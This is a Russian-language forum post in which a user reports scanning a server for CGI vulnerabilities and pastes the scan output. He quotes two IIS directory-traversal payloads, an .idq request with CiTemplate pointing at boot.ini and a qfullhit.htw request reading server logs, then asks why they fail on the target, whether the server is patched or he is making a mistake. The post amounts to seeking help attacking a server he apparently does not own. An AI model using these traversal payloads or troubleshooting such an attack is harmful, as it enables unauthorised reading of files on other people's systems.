De}{is
Сообщений: 137
Оценки: 0
Присоединился: 2005-11-22 11:21:42
|
Недавно сканил один сервак на CGI-уязвимости и получил такой отчет:
www.balabla.ru/notexist.htw - [ 200 SUCCESS ] www.balabla.ru/notexist.ida - [ 200 SUCCESS ] www.balabla.ru/notexist.idq - [ 200 SUCCESS ] www.balabla.ru/prxdocs/misc/prxrch.idq - [ 200 SUCCESS ]
Пошарил по сети и везде пишут, что при наличии данных файлов на серваке (в моем случаи IIS v5.0) можно просматривать любые файлы:
http://www.victim.com/blabla.idq?CiTemplate=../../../boot.ini
http://www.server.com/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile= /../../winnt/system32/logfiles/w3svc1/ex000127.log&CiRestriction=none&CiHiliteType=Full
Но в первом случаии я получаю в ответ:
Le fichier IDQ notexist.idq n''a pas pu être trouvé.
А во втором:
Le chemin spécifié n''est pas correct.
(кажися по французски)
Значит ли это, что севак пропатчен или я то-то не так делаю???
|